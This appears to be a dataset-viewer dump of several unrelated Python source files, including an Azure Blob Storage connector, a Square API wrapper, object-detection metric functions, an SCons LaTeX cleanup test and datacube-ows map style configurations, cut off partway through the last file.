filename
stringlengths 13
19
| text
stringlengths 134
1.04M
|
---|---|
the-stack_106_16803
|
import os
import logging
import azure.storage.blob
import azure.core.exceptions
from ubiops_connector import OutputConnector, ConnectorError, RecoverableConnectorError, get_variable, retry
logger = logging.getLogger('Azure Blob Storage Connector')
class Deployment(OutputConnector):
def __init__(self, base_directory, context):
"""
:param str base_directory: absolute path to the directory where the deployment file is located
:param dict context: a dictionary containing details of the deployment that might be useful in your code
"""
OutputConnector.__init__(self, base_directory, context)
# Setup the Azure blob client
self.blob_service_client = self.setup()
def setup(self):
"""
Setup the Azure Blob Storage client
:return: azure.storage.blob.BlobServiceClient client: a blob service client
"""
try:
return azure.storage.blob.BlobServiceClient.from_connection_string(
conn_str=get_variable('CONNECTION_STRING', '')
)
except azure.core.exceptions.AzureError as e:
raise ConnectorError(f"Failed to initialise Azure Storage client: {e}")
@retry(attempts=3)
def insert(self, data):
"""
Insert given data to Azure Blob Storage
:param dict data: a dictionary containing the data to be inserted
"""
# The field 'blob' must be present in the data. It contains the blob file path to be uploaded.
if 'blob' not in data:
raise ConnectorError("Field 'blob' is not given in the input")
file_path = data['blob']
filename = os.path.basename(file_path)
path_prefix = get_variable('PATH_PREFIX', '')
# Generate the object path by concatenating (optional) path prefix and filename
object_path = os.path.join(path_prefix, filename)
try:
blob_client = self.blob_service_client.get_blob_client(
container=get_variable('CONTAINER'), blob=object_path
)
with open(file_path, "rb") as data:
blob_client.upload_blob(data=data, timeout=int(get_variable('TIMEOUT', '10')))
except azure.core.exceptions.AzureError as e:
raise RecoverableConnectorError(f"Failed to insert blob: {e}")
logger.info("Blob inserted successfully")
|
the-stack_106_16805
|
"""Class module to interface with Square.
"""
import os
from aracnid_logger import Logger
from dateutil import tz, utils
from dateutil.parser import parse
from square.client import Client
# initialize logging
logger = Logger(__name__).get_logger()
class SquareInterface:
"""Interface to Square.
Environment Variables:
SQUARE_ACCESS_TOKEN: OAuth 2.0 Access Token for Square API
SQUARE_ENV: Square API Environment
Attributes:
api_orders: Square client to the Orders API.
api_payments: Square client to the Payments API.
api_refunds: Square client to the Refunds API.
square_client: The Square Client.
"""
def __init__(self):
"""Initializes the Square interface.
Args:
square_client: The Square Client.
"""
square_access_token = os.environ.get('SQUARE_ACCESS_TOKEN')
square_environment = os.environ.get('SQUARE_ENV')
self.square_client = Client(
access_token=square_access_token,
environment=square_environment
)
self.api_orders = self.square_client.orders
self.api_payments = self.square_client.payments
self.api_refunds = self.square_client.refunds
self.api_catalog = self.square_client.catalog
self.api_locations = self.square_client.locations
def decode_order(self, order):
"""Decodes a Square Order into a python dictionary.
Square represents timestamps as RFC 3339 strings. This method decodes
these strings into localized datetime objects.
Args:
order: The Square Order object.
"""
if 'created_at' in order:
order['created_at'] = self.decode_datetime(
order['created_at'])
if 'updated_at' in order:
order['updated_at'] = self.decode_datetime(
order['updated_at'])
if 'closed_at' in order:
order['closed_at'] = self.decode_datetime(
order['closed_at'])
if 'fulfillments' in order:
for fulfillment in order['fulfillments']:
self.decode_fulfillment(fulfillment)
if 'tenders' in order:
for tender in order['tenders']:
self.decode_tender(tender)
if 'refunds' in order:
for refund in order['refunds']:
self.decode_refund(refund)
def decode_fulfillment(self, fulfillment):
"""Decodes a Square OrderFulfillment into a python dictionary.
Square represents timestamps as RFC 3339 strings. This method decodes
these strings into localized datetime objects.
Args:
fulfillment: The Square OrderFulfillment object.
"""
if 'pickup_details' in fulfillment:
pickup_details = fulfillment['pickup_details']
self.decode_fulfillment_pickup(pickup_details)
if 'shipment_details' in fulfillment:
shipment_details = fulfillment['shipment_details']
self.decode_fulfillment_shipment(shipment_details)
def decode_fulfillment_pickup(self, pickup_details):
"""Decodes a Square OrderFulfillment pickup details.
Square represents timestamps as RFC 3339 strings. This method decodes
these strings into localized datetime objects.
Args:
pickup_details: The Square OrderFulfillment pickup details.
"""
if 'accepted_at' in pickup_details:
pickup_details['accepted_at'] = self.decode_datetime(
pickup_details['accepted_at'])
if 'canceled_at' in pickup_details:
pickup_details['canceled_at'] = self.decode_datetime(
pickup_details['canceled_at'])
if 'curbside_pickup_details' in pickup_details:
curbside_pickup_details = pickup_details['curbside_pickup_details']
curbside_pickup_details['buyer_arrived_at'] = self.decode_datetime(
curbside_pickup_details['buyer_arrived_at'])
if 'expired_at' in pickup_details:
pickup_details['expired_at'] = self.decode_datetime(
pickup_details['expired_at'])
if 'picked_up_at' in pickup_details:
pickup_details['picked_up_at'] = self.decode_datetime(
pickup_details['picked_up_at'])
if 'pickup_at' in pickup_details:
pickup_details['pickup_at'] = self.decode_datetime(
pickup_details['pickup_at'])
if 'placed_at' in pickup_details:
pickup_details['placed_at'] = self.decode_datetime(
pickup_details['placed_at'])
if 'ready_at' in pickup_details:
pickup_details['ready_at'] = self.decode_datetime(
pickup_details['ready_at'])
if 'rejected_at' in pickup_details:
pickup_details['rejected_at'] = self.decode_datetime(
pickup_details['rejected_at'])
def decode_fulfillment_shipment(self, shipment_details):
"""Decodes a Square OrderFulfillment shipment details.
Square represents timestamps as RFC 3339 strings. This method decodes
these strings into localized datetime objects.
Args:
shipment_details: The Square OrderFulfillment shipment details.
"""
if 'canceled_at' in shipment_details:
shipment_details['canceled_at'] = self.decode_datetime(
shipment_details['canceled_at'])
if 'expected_shipped_at' in shipment_details:
shipment_details['expected_shipped_at'] = self.decode_datetime(
shipment_details['expected_shipped_at'])
if 'failed_at' in shipment_details:
shipment_details['failed_at'] = self.decode_datetime(
shipment_details['failed_at'])
if 'in_progress_at' in shipment_details:
shipment_details['in_progress_at'] = self.decode_datetime(
shipment_details['in_progress_at'])
if 'packaged_at' in shipment_details:
shipment_details['packaged_at'] = self.decode_datetime(
shipment_details['packaged_at'])
if 'placed_at' in shipment_details:
shipment_details['placed_at'] = self.decode_datetime(
shipment_details['placed_at'])
if 'shipped_at' in shipment_details:
shipment_details['shipped_at'] = self.decode_datetime(
shipment_details['shipped_at'])
def decode_tender(self, tender):
"""Decodes a Square Tender into a python dictionary.
Square represents timestamps as RFC 3339 strings. This method decodes
these strings into localized datetime objects.
Args:
tender: The Square Tender object.
"""
if 'created_at' in tender:
tender['created_at'] = self.decode_datetime(
tender['created_at'])
def decode_payment(self, payment):
"""Decodes a Square Payment into a python dictionary.
Square represents timestamps as RFC 3339 strings. This method decodes
these strings into localized datetime objects.
Args:
payment: The Square Payment object.
"""
if 'created_at' in payment:
payment['created_at'] = self.decode_datetime(
payment['created_at'])
if 'updated_at' in payment:
payment['updated_at'] = self.decode_datetime(
payment['updated_at'])
if 'processing_fee' in payment:
for fee in payment['processing_fee']:
if 'effective_at' in fee:
fee['effective_at'] = self.decode_datetime(
fee['effective_at'])
if 'delayed_until' in payment:
payment['delayed_until'] = self.decode_datetime(
payment['delayed_until'])
def decode_refund(self, refund):
"""Decodes a Square PaymentRefund into a python dictionary.
Square represents timestamps as RFC 3339 strings. This method decodes
these strings into localized datetime objects.
Args:
refund: The Square PaymentRefund object.
"""
if 'created_at' in refund:
refund['created_at'] = self.decode_datetime(
refund['created_at'])
if 'updated_at' in refund:
refund['updated_at'] = self.decode_datetime(
refund['updated_at'])
if 'processing_fee' in refund:
for fee in refund['processing_fee']:
if 'effective_at' in fee:
fee['effective_at'] = self.decode_datetime(
fee['effective_at'])
def decode_catalog_obj(self, obj, collection):
"""Decodes a Square Catalog object into a python dictionary.
Square represents timestamps as RFC 3339 strings. This method decodes
these strings into localized datetime objects.
Args:
obj: The Square Catalog object.
collection: one of the following catalog names
'square_categories', 'square_items', 'square_variations',
'square_modifiers'
"""
if 'updated_at' in obj:
obj['updated_at'] = self.decode_datetime(
obj['updated_at'])
if collection == 'square_items':
variations = obj['item_data']['variations']
for variation in variations:
variation['updated_at'] = self.decode_datetime(
variation['updated_at'])
def decode_location(self, location):
"""Decodes a Square Location into a python dictionary.
Square represents timestamps as RFC 3339 strings. This method decodes
these strings into localized datetime objects.
Args:
location: The Square Location object.
"""
if 'created_at' in location:
location['created_at'] = self.decode_datetime(
location['created_at'])
@staticmethod
def decode_datetime(dt_str):
"""Decodes a Square datetime string into a datetime object
The datetime.fromisoformat() class method does not handle "Z" timezone
notation, so the default_tzinfo() method is used instead.
Args:
dt_str: Datetime string to decode.
"""
return utils.default_tzinfo(parse(dt_str), tz.tzlocal())
def search(self, obj_type, search_filter):
"""Retrieves a list of filtered Square objects.
Args:
obj_type: Type of Square object to search, e.g., 'orders', 'items', etc.
search_filter: Search filter
Returns:
List of Square objects that meet the filter criteria.
"""
obj_list = []
# get the api for the object
api_type = None
if obj_type == 'orders':
api_type = self.api_orders
elif obj_type == 'objects':
api_type = self.api_catalog
if not api_type:
return obj_list
loop_count = 0
result = self.search_fn(obj_type, search_filter)
if result.is_success():
loop_count += 1
obj_list = result.body.get(obj_type)
# process remaining pages
cursor = result.body['cursor'] if 'cursor' in result.body else None
while cursor:
search_filter['cursor'] = cursor
result = self.search_fn(obj_type, search_filter)
if result.is_success():
loop_count += 1
obj_list.extend(result.body[obj_type])
cursor = result.body['cursor'] if 'cursor' in result.body else None
elif result.is_error():
logger.error(f'Error calling Square Api ({obj_type}): {loop_count}')
logger.error(result.errors)
elif result.is_error():
logger.error(f'Error calling Square Api ({obj_type}): loop {loop_count}')
logger.error(result.errors)
return obj_list
def search_fn(self, obj_type, search_filter):
"""Executes the search function for the specified "obj_type".
Args:
obj_type: Type of Square object to search, e.g., 'orders', 'items', etc.
search_filter: Search filter
Returns:
Result of the search function.
"""
if obj_type == 'orders':
return self.api_orders.search_orders(search_filter)
if obj_type == 'objects':
return self.api_catalog.search_catalog_objects(search_filter)
return None
|
the-stack_106_16807
|
from unitsofmeasure import decprefix
def test():
items = decprefix.prefixes.items()
assert len(items) == 20 # there are 20 decimal prefixes
for (key, prefix) in items:
print(key, prefix)
assert key == prefix.symbol
assert prefix.base == 10
assert prefix.exponent >= -24
assert prefix.exponent <= 24
assert len(prefix.symbol) > 0
assert len(prefix.name) > 0
def test_order():
prefixes = [
decprefix.y,
decprefix.z,
decprefix.a,
decprefix.f,
decprefix.p,
decprefix.n,
decprefix.µ,
decprefix.m,
decprefix.c,
decprefix.d,
decprefix.da,
decprefix.h,
decprefix.k,
decprefix.M,
decprefix.G,
decprefix.T,
decprefix.P,
decprefix.E,
decprefix.Z,
decprefix.Y
]
prev = None
for prefix in prefixes:
if prev is not None:
print(prev, "<", prefix)
assert prev < prefix
assert prefix > prev
prev = prefix
|
the-stack_106_16810
|
import os
import pymysql
import requests as r
from multiprocessing.dummy import Pool as ThreadPool
connection = pymysql.connect(host='localhost',
user='root',
password='root',
db='kinglee-info',
charset='utf8mb4')
def do(fetch_single_result):
article_index, pictures = fetch_single_result
# print(f"Article {article_index}, {len(pictures[0].split('|'))} files contained.")
for pic_index, picture in enumerate(pictures[0].split("|")):
try:
if len(picture) > 0 and "http" in picture:
# print(f"Downloading {picture}")
binary = r.get(picture)
file_name = f"article{article_index}_pic{pic_index}.{picture.split('.')[-1].lower()}"
with open(f"nosync_news_picture_mttry\\{file_name}", "bw") as file:
file.write(bytes(binary.content))
else:
print(f"DLERROR: {picture} is not a valid url.")
except:
print(f"SYSERROR: During the process of downloading {picture}, an error has occurred.")
try:
with connection.cursor() as cursor:
# Read a single record
sql = "SELECT `images` FROM `articles`"
cursor.execute(sql)
fetch_results = cursor.fetchall()
print(f"fetched data. len: {len(fetch_results)}")
with ThreadPool(24) as p:
p.map(do, enumerate(fetch_results))
finally:
connection.close()
|
the-stack_106_16815
|
#
# encoders for various output formats
#
# the dumps() method will be called
#
import io
import csv
import dicttoxml
from datetime import datetime
import uuid
import pow_vue
def pow_json_serializer(obj):
"""JSON serializer for objects not serializable by default json code"""
if isinstance(obj, datetime):
#serial = obj.isoformat()
serial = obj.strftime(pow_vue.config.myapp["date_format"])
return serial
if isinstance(obj, uuid.UUID):
return str(obj)
# add your own additions below here.
raise TypeError ("Type not serializable")
class JsonToCsv():
""" flattens json and converts the flattened
data to csv
"""
def flattenjson(self, mp, delim="_"):
""" flattens a json.
separated nested keys are chained using delim
{
"a" : {
"b" : "1",
"c" : "2"
}
}
rsults in =>
{
"a_b" : "1",
"a_c" : "2",
}
"""
ret = []
if isinstance(mp, dict):
for k in mp.keys():
csvs = self.flattenjson(mp[k], delim)
for csv in csvs:
ret.append(k + delim + str(csv))
elif isinstance(mp, list):
for k in mp:
csvs = self.flattenjson(k, delim)
for csv in csvs:
ret.append(str(csv))
else:
ret.append(mp)
return ret
def dumps(self, data):
""" dumps data to csv.
data will be flattened before
"""
flat_json = self.flattenjson(data)
output = io.StringIO()
writer = csv.writer(output, quoting=csv.QUOTE_NONNUMERIC)
writer.writerow(flat_json)
return output.getvalue()
class JsonToXml():
def dumps(self, data, root="pow_model"):
"""
returns the xml representation of a dict input data
root / custom_root is the root node name of the xml document.
data is a dict.
usage: encoder.dumps(model.to_dict, root="some custom root name")
"""
#print(data)
#print(dicttoxml.dicttoxml(data))
return dicttoxml.dicttoxml(data, custom_root=root)
|
the-stack_106_16816
|
# Model validation metrics
import matplotlib.pyplot as plt
import numpy as np
def fitness(x):
# Model fitness as a weighted combination of metrics
w = [0.0, 0.0, 0.1, 0.9] # weights for [P, R, [email protected], [email protected]:0.95]
return (x[:, :4] * w).sum(1)
def fitness_p(x):
# Model fitness as a weighted combination of metrics
w = [1.0, 0.0, 0.0, 0.0] # weights for [P, R, [email protected], [email protected]:0.95]
return (x[:, :4] * w).sum(1)
def fitness_r(x):
# Model fitness as a weighted combination of metrics
w = [0.0, 1.0, 0.0, 0.0] # weights for [P, R, [email protected], [email protected]:0.95]
return (x[:, :4] * w).sum(1)
def fitness_ap50(x):
# Model fitness as a weighted combination of metrics
w = [0.0, 0.0, 1.0, 0.0] # weights for [P, R, [email protected], [email protected]:0.95]
return (x[:, :4] * w).sum(1)
def fitness_ap(x):
# Model fitness as a weighted combination of metrics
w = [0.0, 0.0, 0.0, 1.0] # weights for [P, R, [email protected], [email protected]:0.95]
return (x[:, :4] * w).sum(1)
def fitness_f(x):
# Model fitness as a weighted combination of metrics
#w = [0.0, 0.0, 0.0, 1.0] # weights for [P, R, [email protected], [email protected]:0.95]
return ((x[:, 0]*x[:, 1])/(x[:, 0]+x[:, 1]))
def ap_per_class(tp, conf, pred_cls, target_cls, plot=False, fname='precision-recall_curve.png'):
""" Compute the average precision, given the recall and precision curves.
Source: https://github.com/rafaelpadilla/Object-Detection-Metrics.
# Arguments
tp: True positives (nparray, nx1 or nx10).
conf: Objectness value from 0-1 (nparray).
pred_cls: Predicted object classes (nparray).
target_cls: True object classes (nparray).
plot: Plot precision-recall curve at [email protected]
fname: Plot filename
# Returns
The average precision as computed in py-faster-rcnn.
"""
# Sort by objectness
i = np.argsort(-conf)
tp, conf, pred_cls = tp[i], conf[i], pred_cls[i]
# Find unique classes
unique_classes = np.unique(target_cls)
# Create Precision-Recall curve and compute AP for each class
px, py = np.linspace(0, 1, 1000), [] # for plotting
pr_score = 0.1 # score to evaluate P and R https://github.com/ultralytics/yolov3/issues/898
s = [unique_classes.shape[0], tp.shape[1]] # number class, number iou thresholds (i.e. 10 for mAP0.5...0.95)
ap, p, r = np.zeros(s), np.zeros(s), np.zeros(s)
for ci, c in enumerate(unique_classes):
i = pred_cls == c
n_l = (target_cls == c).sum() # number of labels
n_p = i.sum() # number of predictions
if n_p == 0 or n_l == 0:
continue
else:
# Accumulate FPs and TPs
fpc = (1 - tp[i]).cumsum(0)
tpc = tp[i].cumsum(0)
# Recall
recall = tpc / (n_l + 1e-16) # recall curve
r[ci] = np.interp(-pr_score, -conf[i], recall[:, 0]) # r at pr_score, negative x, xp because xp decreases
# Precision
precision = tpc / (tpc + fpc) # precision curve
p[ci] = np.interp(-pr_score, -conf[i], precision[:, 0]) # p at pr_score
# AP from recall-precision curve
for j in range(tp.shape[1]):
ap[ci, j], mpre, mrec = compute_ap(recall[:, j], precision[:, j])
if j == 0:
py.append(np.interp(px, mrec, mpre)) # precision at [email protected]
# Compute F1 score (harmonic mean of precision and recall)
f1 = 2 * p * r / (p + r + 1e-16)
if plot:
py = np.stack(py, axis=1)
fig, ax = plt.subplots(1, 1, figsize=(5, 5))
ax.plot(px, py, linewidth=0.5, color='grey') # plot(recall, precision)
ax.plot(px, py.mean(1), linewidth=2, color='blue', label='all classes %.3f [email protected]' % ap[:, 0].mean())
ax.set_xlabel('Recall')
ax.set_ylabel('Precision')
ax.set_xlim(0, 1)
ax.set_ylim(0, 1)
plt.legend()
fig.tight_layout()
fig.savefig(fname, dpi=200)
return p, r, ap, f1, unique_classes.astype('int32')
def compute_ap(recall, precision):
""" Compute the average precision, given the recall and precision curves.
Source: https://github.com/rbgirshick/py-faster-rcnn.
# Arguments
recall: The recall curve (list).
precision: The precision curve (list).
# Returns
The average precision as computed in py-faster-rcnn.
"""
# Append sentinel values to beginning and end
mrec = recall # np.concatenate(([0.], recall, [recall[-1] + 1E-3]))
mpre = precision # np.concatenate(([0.], precision, [0.]))
# Compute the precision envelope
mpre = np.flip(np.maximum.accumulate(np.flip(mpre)))
# Integrate area under curve
method = 'interp' # methods: 'continuous', 'interp'
if method == 'interp':
x = np.linspace(0, 1, 101) # 101-point interp (COCO)
ap = np.trapz(np.interp(x, mrec, mpre), x) # integrate
else: # 'continuous'
i = np.where(mrec[1:] != mrec[:-1])[0] # points where x axis (recall) changes
ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1]) # area under curve
return ap, mpre, mrec
|
the-stack_106_16819
|
from model.contact import Contact
testdata = [
Contact(first_name="first", last_name="last", email="em", email2="em2", email3="em3",
day="day", month="mon", year="year", notes="no",
homephone="home", mobilephone="mob", workphone="work", secondaryphone="sec",
address="add", address2="add2"),
Contact(first_name="first_1", last_name="last_1", email="em_1", email2="em2_1", email3="em3_1",
day="day_1", month="mon_1", year="year_1", notes="no_1",
homephone="home_1", mobilephone="mob_1", workphone="work_1", secondaryphone="sec_1",
address="add_1", address2="add2_1"),
]
|
the-stack_106_16821
|
#!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/TEX/clean.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
"""
Check that all auxilary files created by LaTeX are properly cleaned by scons -c.
"""
import os
import TestSCons
test = TestSCons.TestSCons()
latex = test.where_is('latex')
if not latex:
test.skip_test("Could not find tex or latex; skipping test(s).\n")
comment = os.system('kpsewhich comment.sty')
if not comment==0:
test.skip_test("comment.sty not installed; skipping test(s).\n")
# package hyperref generates foo.out
# package comment generates comment.cut
# todo: add makeindex etc.
input_file = r"""
\documentclass{article}
\usepackage{hyperref}
\usepackage{comment}
\specialcomment{foocom}{}{}
\begin{document}
\begin{foocom}
Hi
\end{foocom}
As stated in \cite{X}, this is a bug-a-boo.
\bibliography{fooref}
\bibliographystyle{plain}
\end{document}
"""
bibfile = r"""
@Article{X,
author = "Mr. X",
title = "A determination of bug-a-boo-ness",
journal = "Journal of B.a.B.",
year = 1920,
volume = 62,
pages = 291
}
"""
test.write('SConstruct', """\
import os
env = Environment(tools = ['tex', 'latex'])
env.DVI( "foo.ltx" )
""")
test.write('foo.ltx', input_file)
test.write('fooref.bib', bibfile)
test.run()
test.must_exist('foo.log')
test.must_exist('foo.aux')
test.must_exist('foo.bbl')
test.must_exist('foo.blg')
test.must_exist('comment.cut')
test.must_exist('foo.out')
test.run(arguments = '-c')
test.must_not_exist('foo.log')
test.must_not_exist('foo.aux')
test.must_not_exist('foo.bbl')
test.must_not_exist('foo.blg')
test.must_not_exist('comment.cut')
test.must_not_exist('foo.out')
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
the-stack_106_16823
|
from ows_refactored.ows_legend_cfg import legend_idx_0_1_5ticks
style_ls_simple_rgb = {
"name": "simple_rgb",
"title": "Simple RGB",
"abstract": "Simple true-colour image, using the red, green and blue bands",
"components": {"red": {"red": 1.0}, "green": {"green": 1.0}, "blue": {"blue": 1.0}},
"scale_range": [0.0, 3000.0],
}
style_ls_irg = {
"name": "infrared_green",
"title": "False colour - Green, SWIR, NIR",
"abstract": "False Colour image with SWIR1->Red, NIR->Green, and Green->Blue",
"components": {
"red": {"swir1": 1.0},
"green": {"nir": 1.0},
"blue": {"green": 1.0},
},
"scale_range": [0.0, 3000.0],
}
style_ls_ndvi = {
"name": "ndvi",
"title": "NDVI - Red, NIR",
"abstract": "Normalised Difference Vegetation Index - a derived index that correlates well with the existence of vegetation",
"index_function": {
"function": "datacube_ows.band_utils.norm_diff",
"mapped_bands": True,
"kwargs": {"band1": "nir", "band2": "red"},
},
"needed_bands": ["red", "nir"],
"color_ramp": [
{"value": -0.0, "color": "#8F3F20", "alpha": 0.0},
{"value": 0.0, "color": "#8F3F20", "alpha": 1.0},
{"value": 0.1, "color": "#A35F18"},
{"value": 0.2, "color": "#B88512"},
{"value": 0.3, "color": "#CEAC0E"},
{"value": 0.4, "color": "#E5D609"},
{"value": 0.5, "color": "#FFFF0C"},
{"value": 0.6, "color": "#C3DE09"},
{"value": 0.7, "color": "#88B808"},
{"value": 0.8, "color": "#529400"},
{"value": 0.9, "color": "#237100"},
{"value": 1.0, "color": "#114D04"},
],
"legend": legend_idx_0_1_5ticks,
}
style_ls_ndwi = {
"name": "ndwi",
"title": "NDWI - Green, NIR",
"abstract": "Normalised Difference Water Index - a derived index that correlates well with the existence of water (McFeeters 1996)",
"index_function": {
"function": "datacube_ows.band_utils.norm_diff",
"mapped_bands": True,
"kwargs": {"band1": "green", "band2": "nir"},
},
"needed_bands": ["green", "nir"],
"color_ramp": [
{"value": -0.1, "color": "#f7fbff", "alpha": 0.0},
{
"value": 0.0,
"color": "#d8e7f5",
},
{"value": 0.1, "color": "#b0d2e8"},
{
"value": 0.2,
"color": "#73b3d8",
},
{"value": 0.3, "color": "#3e8ec4"},
{
"value": 0.4,
"color": "#1563aa",
},
{
"value": 0.5,
"color": "#08306b",
},
],
"legend": {
"begin": "0.0",
"end": "0.5",
"decimal_places": 1,
"ticks": ["0.0", "0.2", "0.4", "0.5"],
"tick_labels": {
"0.0": {"prefix": "<"},
"0.2": {"label": "0.2"},
"0.4": {"label": "0.4"},
"0.5": {"prefix": ">"},
},
},
}
style_ls_mndwi = {
"name": "mndwi",
"title": "MNDWI - Green, SWIR",
"abstract": "Modified Normalised Difference Water Index - a derived index that correlates well with the existence of water (Xu 2006)",
"index_function": {
"function": "datacube_ows.band_utils.norm_diff",
"mapped_bands": True,
"kwargs": {"band1": "green", "band2": "swir1"},
},
"needed_bands": ["green", "swir1"],
"color_ramp": [
{"value": -0.1, "color": "#f7fbff", "alpha": 0.0},
{"value": 0.0, "color": "#d8e7f5"},
{"value": 0.2, "color": "#b0d2e8"},
{"value": 0.4, "color": "#73b3d8"},
{"value": 0.6, "color": "#3e8ec4"},
{"value": 0.8, "color": "#1563aa"},
{"value": 1.0, "color": "#08306b"},
],
"legend": legend_idx_0_1_5ticks,
}
style_ls_pure_blue = {
"name": "blue",
"title": "Blue - 480",
"abstract": "Blue band, centered on 480nm",
"components": {"red": {"blue": 1.0}, "green": {"blue": 1.0}, "blue": {"blue": 1.0}},
"scale_range": [0.0, 3000.0],
}
style_ls_pure_green = {
"name": "green",
"title": "Green - 560",
"abstract": "Green band, centered on 560nm",
"components": {
"red": {"green": 1.0},
"green": {"green": 1.0},
"blue": {"green": 1.0},
},
"scale_range": [0.0, 3000.0],
}
style_ls_pure_red = {
"name": "red",
"title": "Red - 660",
"abstract": "Red band, centered on 660nm",
"components": {"red": {"red": 1.0}, "green": {"red": 1.0}, "blue": {"red": 1.0}},
"scale_range": [0.0, 3000.0],
}
style_ls_pure_nir = {
"name": "nir",
"title": "Near Infrared (NIR) - 840",
"abstract": "Near infra-red band, centered on 840nm",
"components": {"red": {"nir": 1.0}, "green": {"nir": 1.0}, "blue": {"nir": 1.0}},
"scale_range": [0.0, 3000.0],
}
style_ls_pure_swir1 = {
"name": "swir1",
"title": "Shortwave Infrared (SWIR) - 1650",
"abstract": "Short wave infra-red band 1, centered on 1650nm",
"components": {
"red": {"swir1": 1.0},
"green": {"swir1": 1.0},
"blue": {"swir1": 1.0},
},
"scale_range": [0.0, 3000.0],
}
style_ls_pure_swir2 = {
"name": "swir2",
"title": "Shortwave Infrared (SWIR) - 2220",
"abstract": "Short wave infra-red band 2, centered on 2220nm",
"components": {
"red": {"swir2": 1.0},
"green": {"swir2": 1.0},
"blue": {"swir2": 1.0},
},
"scale_range": [0.0, 3000.0],
}
# styles tmad
sdev_scaling = [0.020, 0.18]
edev_scaling = [6.2, 7.3]
bcdev_scaling = [0.025, 0.13]
style_tmad_sdev_std = {
"name": "arcsec_sdev",
"title": "Spectral MAD (SMAD)",
"abstract": "Good for cropland and forest",
"index_function": {
"function": "datacube_ows.band_utils.single_band_arcsec",
"mapped_bands": True,
"kwargs": {"band": "sdev", "scale_from": sdev_scaling, "scale_to": [0.0, 4.0]},
},
"needed_bands": ["sdev"],
"mpl_ramp": "coolwarm",
"range": [0.0, 4.0],
"legend": {
"start": "0.0",
"end": "4.0",
"ticks": ["0.0", "4.0"],
"tick_labels": {
"0.0": {"label": "Low\nSMAD"},
"4.0": {"label": "High\nSMAD"},
},
},
}
style_tmad_edev_std = {
"name": "log_edev",
"title": "Euclidean MAD (EMAD)",
"abstract": "Good for cropland and forest",
"index_function": {
"function": "datacube_ows.band_utils.single_band_offset_log",
"mapped_bands": True,
"kwargs": {"band": "edev", "scale_from": edev_scaling, "scale_to": [0.0, 4.0]},
},
"needed_bands": ["edev"],
"mpl_ramp": "coolwarm",
"range": [0.0, 4.0],
"legend": {
"start": "0.0",
"end": "4.0",
"ticks": ["0.0", "4.0"],
"tick_labels": {
"0.0": {"label": "Low\nEMAD"},
"4.0": {"label": "High\nEMAD"},
},
},
}
style_tmad_bcdev_std = {
"name": "log_bcdev",
"title": "Bray-Curtis MAD (BCMAD)",
"abstract": "Good for cropland and forest",
"index_function": {
"function": "datacube_ows.band_utils.single_band_offset_log",
"mapped_bands": True,
"kwargs": {
"band": "bcdev",
"scale_from": bcdev_scaling,
"scale_to": [0.0, 4.0],
},
},
"needed_bands": ["bcdev"],
"mpl_ramp": "coolwarm",
"range": [0.0, 4.0],
"legend": {
"start": "0.0",
"end": "4.0",
"ticks": ["0.0", "4.0"],
"tick_labels": {
"0.0": {"label": "Low\nBCMAD"},
"4.0": {"label": "High\nBCMAD"},
},
},
}
style_tmad_rgb_std = {
"name": "tmad_rgb_std",
"title": "MADs - SMAD, EMAD, BCMAD",
"abstract": "Good for cropland and forest",
"components": {
"red": {
"function": "datacube_ows.band_utils.single_band_arcsec",
"mapped_bands": True,
"kwargs": {
"band": "sdev",
"scale_from": sdev_scaling,
},
},
"green": {
"function": "datacube_ows.band_utils.single_band_offset_log",
"mapped_bands": True,
"kwargs": {
"band": "edev",
"scale_from": edev_scaling,
},
},
"blue": {
"function": "datacube_ows.band_utils.single_band_offset_log",
"mapped_bands": True,
"kwargs": {
"band": "bcdev",
"scale_from": bcdev_scaling,
},
},
},
"additional_bands": ["sdev", "bcdev", "edev"],
"legend": {
"show_legend": True,
"url": "https://data.dea.ga.gov.au/tmad-annual/geomad.png",
},
}
style_tmad_rgb_sens = {
"inherits": style_tmad_rgb_std,
"name": "tmad_rgb_sens",
"title": "MADs (desert) - SMAD, EMAD, BCMAD",
"abstract": "Good for arid land and desert",
"components": {
"red": {
"kwargs": {
"scale_from": [0.0005, 0.11],
}
},
"green": {
"kwargs": {
"scale_from": [5.9, 6.9],
}
},
"blue": {
"kwargs": {
"scale_from": [0.008, 0.07],
}
},
},
"legend": {
"show_legend": True,
"url": "https://data.dea.ga.gov.au/tmad-annual/geomad.png",
},
}
style_gm_count = {
"name": "count",
"title": "Clear observation count",
"abstract": "Count of observations included in geomedian/MAD calculations",
"index_function": {
"function": "datacube_ows.band_utils.single_band",
"mapped_bands": True,
"kwargs": {
"band": "count",
},
},
"needed_bands": ["count"],
"include_in_feature_info": False,
"color_ramp": [
{"value": 0, "color": "#666666", "alpha": 0},
{
# purely for legend display
# we should not get fractional
# values in this styles
"value": 0.2,
"color": "#890000",
"alpha": 1,
},
{"value": 5, "color": "#990000"},
{"value": 10, "color": "#E38400"},
{"value": 15, "color": "#E3DF00"},
{"value": 20, "color": "#A6E300"},
{"value": 25, "color": "#00E32D"},
{"value": 30, "color": "#00E3C8"},
{"value": 35, "color": "#0097E3"},
{"value": 40, "color": "#005FE3"},
{"value": 45, "color": "#000FE3"},
{"value": 50, "color": "#000EA9"},
{"value": 55, "color": "#5700E3"},
],
"legend": {
"begin": "0",
"end": "50",
"decimal_places": 0,
